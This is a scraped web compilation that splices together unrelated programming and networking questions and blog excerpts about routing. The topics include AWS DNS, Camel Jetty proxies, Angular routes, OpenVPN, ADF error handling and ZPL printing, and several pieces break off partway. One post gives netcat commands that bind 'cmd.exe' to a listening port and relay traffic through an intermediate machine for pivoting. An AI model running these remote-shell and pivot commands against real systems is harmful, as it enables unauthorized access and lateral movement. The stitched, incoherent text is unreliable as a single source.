    Given the following physical layout for a .NET web application: DB (sql server, windows) - No public route (no table access, only stored procs) Web Service DAL (iis, windows) - No public route (can be accessed by web server via port 80 and 443) Web Server (iis, windows) - Public route (only via port 80 and 443) What type(s) / examples of attack could be used to compromise the public web server but would be blocked by the Web Service DAL? i.e. can you think of concrete attack types that the DAL stops? Please note, I am interested only in the security aspect, not scaling / fault tolerance / performance / etc. In my mind if the web server has been compromised using an attack over port 80/443, then the same attack would work over port 80/443 to the Web Service DAL box.

    I am trying to setup a loadBalancer on AWS. The A-Record it gave me looks like myLoadBalancer-**********.us-east-1.elb.amazonaws.com however when i try to put that in my domain registrars A-Record, i get an errorIP address is not valid. Must be of type x.x.x.x where x is 0-255. amazons solution is you should create a CNAME record for the LoadBalancer DNS name, or use Amazon Route 53 to create a hosted zone. route 53 gives me DNS numbers but if i use that then my email doesnt work from the registrar. question: is there a way to use route 53 and retain my emails? or should i create a CNAME record for the LoadBalancer DNS name, if so how do i do this ... not sure what this means?

  • Can Camel Jetty proxy URL share the webapplication context

    I am struggling with Camel Jetty Proxy Routes. At times, the routes exhibits inconsistent behavior. My Proxy app deployed with context root "Proxy", however, if give that as the context path for my proxy URL I get service not found error. If change the Proxy to an arbitrary context such as "Dummy" then the route works. Is that how camel jetty component works? From Path: jetty:http://0.0.0.0:6080/Proxy/PurchaseOrder/?matchOnUriPrefix=true&disableStreamCache=true&traceEnabled=true To Path: jetty:http://localhost:7001/Provider/PurchaseOrder/?bridgeEndpoint=true&throwExceptionOnFailure=false Another issue i noticed with jetty is If deploy both Proxy and Provider on the same app container(same listening port), then the route completely stops working saying "Provider/PurchaseOrder/" service not found. The only way the routes work is, both routes have to run different ports and the from route shouldn't share the webcontext path. I have requirement that if required I should be a able run both Proxy and Provider on the same container. Any help appreciated. Thanks,

    I'm trying to setup a pivoting relay with netcat on Windows, replicating a scenario easily possible by using pipes in Linux. Assume machine A can route to machine B and machine B can route to machine C. If machine A needs to route to machine C, we can setup a relay on machine B which can pivot data back and forth for us using command redirectors and spl filetype pipe. Assume: machine C has nc -nlvp 3306 -e cmd.exe machine A has nc -nlvp 80 IF machine B was Linux we could have done mkfifo pipe nc -nv 127.0.0.1 80 0<pipe | nc -nv 127.0.0.1 3306 1>pipe so on machine B if we do nc -nv 127.0.0.1 80 0<&4 | nc -nv 127.0.0.1 3306 1>&4 Per this site, I should be able to achieve what I can with Linux, but unfortunately it is not working.

  • Routing to a Controller with no View in Angular

    I've finally had some time to put Angular to use this week in a small project I'm working on for fun. Angular's routing is great and makes it real easy to map URL routes to controllers and model data into views. But what if you don't actually need a view, if you effectively need a headless controller that just runs code, but doesn't render a view?Preserve the ViewWhen Angular navigates a route and and presents a new view, it loads the controller and then renders the view from scratch. Views are not cached or stored, but displayed and then removed. So if you have routes configured like this:'use strict'; // Declare app level module which depends on filters, and services window.myApp = angular.module('myApp', ['myApp.filters', 'myApp.services', 'myApp.directives', 'myApp.controllers']). config(['$routeProvider', function($routeProvider) { $routeProvider.when('/map', { template: "partials/map.html ", controller: 'mapController', reloadOnSearch: false, animation: 'slide' }); … $routeProvider.otherwise({redirectTo: '/map'}); }]); Angular routes to the mapController and then re-renders the map.html template with the new data from the $scope filled in.But, but… I don't want a new View!Now in most cases this works just fine. If I'm rendering plain DOM content, or textboxes in a form interface that is all fine and dandy - it's perfectly fine to completely re-render the UI.But in some cases, the UI that's being managed has state and shouldn't be redrawn. In this case the main page in question has a Google Map on it. The map is  going to be manipulated throughout the lifetime of the application and the rest of the pages. In my application I have a toolbar on the bottom and the rest of the content is replaced/switched out by the Angular Views:The problem is that the map shouldn't be redrawn each time the Location view is activated. It should maintain its state, such as the current position selected (which can move), and shouldn't redraw due to the overhead of re-rendering the initial map.Originally I set up the map, exactly like all my other views - as a partial, that is rendered with a separate file, but that didn't work.The Workaround - Controller Only RoutesThe workaround for this goes decidedly against Angular's way of doing things:Setting up a Template-less RouteIn-lining the map view directly into the main pageHiding and showing the map view manuallyLet's see how this works.Controller Only RouteThe template-less route is basically a route that doesn't have any template to render. This is not directly supported by Angular, but thankfully easy to fake. The end goal here is that I want to simply have the Controller fire and then have the controller manage the display of the already active view by hiding and showing the map and any other view content, in effect bypassing Angular's view display management.In short - I want a controller action, but no view rendering.The controller-only or template-less route looks like this: $routeProvider.when('/map', { template: " ", // just fire controller controller: 'mapController', animation: 'slide' });Notice I'm using the template property rather than templateUrl (used in the first example above), which allows specifying a string template, and leaving it blank. The template property basically allows you to provide a templated string using Angular's HandleBar like binding syntax which can be useful at times. You can use plain strings or strings with template code in the template, or as I'm doing here a blank string to essentially fake 'just clear the view'. In-lined ViewSo if there's no view where does the HTML go? Because I don't want Angular to manage the view the map markup is in-lined directly into the page. I would have to resort to storing this setting on the $rootscope which I try to avoid. The same issues exists with the icons.It sure would be nice if Angular had a way to explicitly specify that a View shouldn't be destroyed when another view is activated, so currently this workaround is required. Searching around, I saw a number of whacky hacks to get around this, but this solution I'm using here seems much easier than any of that I could dig up even if it doesn't quite fit the 'Angular way'.Angular nice, until it's notOverall I really like Angular and the way it works although it took me a bit of time to get my head around how all the pieces fit together. Once I got the idea how the app/routes, the controllers and views snap together, putting together Angular pages becomes fairly straightforward. You can get quite a bit done never going beyond those basics. For most common things Angular's default routing and view presentation works very well.But, when you do something a bit more complex, where there are multiple dependencies or as in this case where Angular doesn't appear to support a feature that's absolutely necessary, you're on your own. Finding information on more advanced topics is not trivial especially since versions are changing so rapidly and the low level behaviors are changing frequently so finding something that works is often an exercise in trial and error. Not that this is surprising. Angular is a complex piece of kit as are all the frameworks that try to hack JavaScript into submission to do something that it was really never designed to. After all everything about a framework like Angular is an elaborate hack. A lot of shit has to happen to make this all work together and at that Angular (and Ember, Durandel etc.) are pretty amazing pieces of JavaScript code.     Almost everybody can figure out how to change their IP address using an interface, but did you know you can set your network card’s IP address using a simple command from the command line? Changing Your IP From the Command Line in Linux Note: This will work on all Debian based Linux Distro’s. To get started type ifconfig into the terminal and hit enter, take note of the name of the interface that you want to change the settings for.   • OpenVPN, Server 12.04, connect to machines in home LAN behind VPN server

    Problem: I've set up a working OpenVPN server, and am able to connect to it from anywhere using my mac laptop and tunnelblick. When I connect in, I'm assigned an IP address of 10.8.0.x, the server is 10.8.0.1, so I have no problems SSHing into it. Once SSHd in, I can even ping other machines (obviously) on my home network (192.168.1.x). Desired outcome: What I want, is, to connect to the VPN server, and instead of getting a 10.8.0.x address, I get a 192.168.1.x on my home network. I can't figure out how to talk to the OTHER machines on my home network WITHOUT being SSHd in to the VPN server. I'd like to just connect to my VPN server, then be a part of my home network. Attempted solutions: I've read that I need to set up routes, and/or enable IP forwarding. I enabled IP forwarding using sudo sysctl -w net.ipv4.ip_forward=1 and that doesn't seem to have done anything. I've also uncommented a line in the OpenVPN's server.conf file: # Push routes to the client to allow it # to reach other private subnets behind # the server. Remember that these # private subnets will also need # to know to route the OpenVPN client # address pool (10.8.0.0/255.255.255.0) # back to the OpenVPN server. push "route 192.168.1.0 255.255.255.0" ;push "route 192.168.20.0 255.255.255.0" But still no luck, I still get a 10.8.0.x address... I've also read I may have to add routes to the router itself, but haven't tried that. Any help appreciated, thanks!

The basic dev architecture today is: a single page ajax web UI (ASP.NET MVC) with floating chat windows (think Gmail) a backend Windows service to queue and route the chat requests this service also logs the chats, calculates service levels, etc a Comet server product that routes data between the web frontend and the backend Windows service this also helps us detect which Agents are still connected (online) And our hardware architecture today is: 2 servers to host the web UI portion of the application a load balancer to route requests to the 2 different web app servers a third server to host the SQL Server DB and the backend Windows service responsible for queuing / delivering chats So as it stands today, one of the web app servers could go down and we would be ok. However, if something would happen to the SQL Server / Windows Service server we would be boned. My question - how can I make this backend Windows service logic be able to be spread across multiple machines (distributed)? The Windows service is written to accept requests from the Comet server, check for available Agents, and route the chat to those agents. How can I make this more distributed? How can I make it so that I can distribute the work of the backend Windows service can be spread across multiple machines for redundancy and uptime purposes? Will I need to re-write it with distributed computing in mind? I should also note that I am hosting all of this on Rackspace Cloud instances - so maybe it is something I should be less concerned about? Thanks in advance for any help!

    Just came a cross a sample written by Steve Muench, which somewhere deep in its implementation details uses the following code to route exceptions to the ADF binding layer to be handled by the ADF model error handler (which can be customized by overriding the DCErrorHandlerImpl class and configuring the custom class in DataBindings.cpx file) To route an exception to the ADFm error handler, Steve used the following code ((DCBindingContainer)BindingContext.getCurrent().getCurrentBindingsEntry()).reportException(ex); The same code however can be used in managed beans as well to enforce consistent error handling in ADF. As an example, lets assume a managed bean method hits an exception. To simulate this, let's use the following code: public void onToolBarButtonAction(ActionEvent actionEvent) {    throw new JboException("Just to tease you !!!!!");        } The exception shows at runtime as displayed in the following image: Assuming a try-catch block is used to intercept the exception caused by a managed bean action, you can route the error message display to the ADF model error handler. Again, let's simulate the code that would need to go into a try-catch block public void onToolBarButtonAction(ActionEvent actionEvent) {    JboException ex = new JboException("Just to tease you !!!!!");  BindingContext bctx = BindingContext.getCurrent();    ((DCBindingContainer)bctx.getCurrentBindingsEntry()).reportException(ex); } The error now displays as shown in the image below As you can see, the error is now handled by the ADFm Error handler, which - as mentioned before - could be a custom error handler. Using the ADF model error handling for displaying exceptions thrown in managed beans require the current ADF Faces page to have an associated PageDef file (which is the case if the page or view contains ADF bound components). Note that to invoke methods exposed on the business service it is recommended to always work through the binding layer (method binding) so that in case of an error the ADF model error handler is automatically used.

  • asp.net hover menu item

    When I hover on a static menu item that has a dynamic menu, the hover styles are in effect but once I start navigating the dynamic menu the static menu item goes back to the non-hover styles. Does anyone know how to make them stick until I stop ''using' that menu? I tried the 'selected' static menu item styles but that doesn't work - if I use them, even when I stop navigating the menu the last selected static menu item will display the selected style - after using the menu I want the styles to revert to the normal styles....

  • ZPL II Extended Characters

    I'm trying to print extended code page 850 characters using ZPL II to a Zebra S4M. Whenever one of the extended characters I.E. ASCII value 127 is used I get a box of varying shades of grey instead of the actual value. I'm trying to print ± and ° (ALT+0177 and ALT+0176). I suspect its the RawPrinterHelper I am trying to use (as downloaded from MS, and another from CodeProject) however I cant see where the character codes are going wrong. Weirdly, printing direct from Notepad renders the correct characters, which leads me to believe it is a problem with the raw printer helper class. I am not tied to using the Raw Printer Helper class so if there is a better way of doing it, I am more than happy to see them. I run the "same" command at the Windows command line and it works as expected. It must be that they're not the same but I can't for the life of me work out why.
